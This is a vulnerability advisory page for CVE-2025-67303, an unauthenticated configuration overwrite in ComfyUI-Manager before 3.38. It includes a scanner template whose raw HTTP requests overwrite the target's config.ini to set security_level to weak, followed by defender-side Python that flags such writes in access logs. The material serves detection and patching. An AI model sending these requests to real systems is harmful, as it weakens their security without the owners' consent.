
ComfyUI-Manager < 3.38 - Configuration Overwrite

CVE-2025-67303
Verified

Description

ComfyUI-Manager versions before 3.38 contain an insecure file storage vulnerability: configuration files are kept in an insufficiently protected location that is reachable through the web interface, so a remote attacker can read and overwrite the configuration and other critical data. Exploitation requires only access to the web interface; no authentication or user interaction is needed.

Severity

Critical

CVSS Score

9.8

Exploit Probability

2%

Affected Product

comfyui-manager

Published Date

March 31, 2026

Template Author

maciejklimek

CVE-2025-67303.yaml
id: CVE-2025-67303

info:
  name: ComfyUI-Manager < 3.38 - Configuration Overwrite
  author: maciejklimek
  severity: critical
  description: |
    ComfyUI-Manager < 3.38 contains an insecure file storage vulnerability caused by storing files in an insufficiently protected location accessible via the web interface, letting remote attackers manipulate configuration and critical data, exploit requires web access.
  impact: |
    Remote attackers can manipulate configuration and critical data, potentially compromising application integrity and security.
  remediation: |
    Update to version 3.38 or later.
  reference:
    - https://github.com/Comfy-Org/ComfyUI-Manager/blob/main/docs/en/v3.38-userdata-security-migration.md
    - https://github.com/vulhub/vulhub/blob/master/comfyui/CVE-2025-67303/README.md
    - https://github.com/Comfy-Org/ComfyUI-Manager/blob/main/docs/en/v3.38-userdata-security-migration.md
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-67303
    epss-score: 0.01551
    epss-percentile: 0.81648
    cwe-id: CWE-420
  metadata:
    verified: true
    max-request: 3
    vendor: comfy-org
    product: comfyui-manager
    shodan-query: http.title:"ComfyUI"
  tags: cve,cve2025,comfyui,comfyui-manager,intrusive,vuln,vkev

http:
  - raw:
      - |
        GET /userdata/ComfyUI-Manager%2Fconfig.ini HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /userdata/ComfyUI-Manager%2Fconfig.ini HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/octet-stream

        [default]
        security_level = weak

      - |
        GET /userdata/ComfyUI-Manager%2Fconfig.ini HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "contains_all(body_1, '[default]', 'security_level')"
          - "contains(body_3, 'security_level = weak')"
          - "status_code_1 == 200 && status_code_3 == 200"
        condition: and
# digest: 4a0a0047304502210099c2955b4f0ec0a811e32d840c78ddc537286922ce410ccbc178672f112ab7b50220256d667becee99546669d79a28f697780b06b44363cf53c09625148ab69006e7:922c64590222798bb761d5b6d8e72950
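The template above establishes the issue with three requests: a GET that reads ComfyUI-Manager's config.ini through the userdata endpoint, a POST that writes a replacement body, and a second GET confirming the write landed. The following Python is an added defender-side example, not code from the template or the ComfyUI-Manager project. It scans web access logs for write requests against that config path (the URL-encoded path from the template, decoded before comparison) and separately checks a retrieved config.ini body for the weakened `security_level = weak` setting the template plants. It assumes the logs are in the common/combined format a reverse proxy in front of ComfyUI would produce; the log lines, client addresses and timestamps are constructed for the example.

```python
import configparser
import re
from urllib.parse import unquote

# Path targeted by the template, as it appears (URL-encoded) in request lines.
MANAGER_CONFIG_PATH = "/userdata/ComfyUI-Manager%2Fconfig.ini"

# Decoded form used for comparison so "%2F" and "/" spellings match alike.
MANAGER_CONFIG_DECODED = "/userdata/comfyui-manager/config.ini"

# Minimal common/combined log format parser: client, timestamp, method, path, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log lines (assumption: reverse proxy in front of ComfyUI).
SAMPLE_LOG = """\
203.0.113.7 - - [31/Mar/2026:10:00:01 +0000] "GET /userdata/ComfyUI-Manager%2Fconfig.ini HTTP/1.1" 200 512
203.0.113.7 - - [31/Mar/2026:10:00:02 +0000] "POST /userdata/ComfyUI-Manager%2Fconfig.ini HTTP/1.1" 200 0
198.51.100.5 - - [31/Mar/2026:10:00:03 +0000] "GET /queue HTTP/1.1" 200 88
203.0.113.7 - - [31/Mar/2026:10:00:04 +0000] "GET /userdata/ComfyUI-Manager%2Fconfig.ini HTTP/1.1" 200 40
""".splitlines()


def parse_line(line):
    """Parse one access-log line; return a dict or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    # Drop any query string, then percent-decode so encoded slashes compare equal.
    rec["decoded_path"] = unquote(rec["path"].split("?", 1)[0])
    return rec


def is_config_write(rec):
    """True when the request writes ComfyUI-Manager's config.ini via the userdata endpoint."""
    return (rec["method"] in ("POST", "PUT")
            and rec["decoded_path"].lower() == MANAGER_CONFIG_DECODED)


def find_overwrite_attempts(lines):
    """Return (client, method, status) for every config write seen in the log lines."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec and is_config_write(rec):
            hits.append((rec["ip"], rec["method"], rec["status"]))
    return hits


def weak_security_level(config_text):
    """True if a config.ini body sets security_level = weak in its [default] section."""
    cp = configparser.ConfigParser()
    cp.read_string(config_text)
    value = cp.get("default", "security_level", fallback="")
    return value.strip().lower() == "weak"


if __name__ == "__main__":
    for ip, method, status in find_overwrite_attempts(SAMPLE_LOG):
        print(f"config write from {ip}: {method} -> HTTP {status}")
    body = "[default]\nsecurity_level = weak\n"
    print("weak security_level present:", weak_security_level(body))
```

A status of 200 on the POST is the signal that the write was accepted; on a patched 3.38 deployment the same request should be rejected, so the second function is most useful for confirming the on-disk config after an upgrade or when reviewing a config.ini retrieved from a host that logged such a write.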
CVSS Metrics

CVSS Score: 9.8
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID: CVE-2025-67303
CWE ID: CWE-420

References

https://github.com/Comfy-Org/ComfyUI-Manager/blob/main/docs/en/v3.38-userdata-security-migration.md
https://github.com/vulhub/vulhub/blob/master/comfyui/CVE-2025-67303/README.md

Remediation Steps

Update to version 3.38 or later.